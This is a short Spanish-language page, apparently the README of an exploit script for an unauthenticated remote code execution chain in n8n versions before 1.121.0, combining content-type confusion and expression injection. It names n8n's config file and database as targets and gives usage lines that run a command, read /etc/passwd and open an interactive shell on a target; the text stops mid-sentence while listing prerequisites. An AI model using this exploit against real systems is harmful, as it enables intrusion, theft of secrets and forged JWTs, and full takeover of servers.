
Cadena de explotación para ejecución remota de código no autenticada en n8n, que combina confusión de tipo de contenido e inyección de expresiones para leer archivos, falsificar JWTs y ejecutar comandos.
Cadena RCE no autenticada para n8n < 1.121.0 (CVSS 10.0)
/home/node/.n8n/config y database.sqlitechild_process# Ejecutar comando
python3 exploit.py http://target:5678 /form/test --cmd "id"
# Leer archivo
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# Shell interactivo
python3 exploit.py http://target:5678 /form/test
El objetivo debe tener un flujo de trabajo activo con: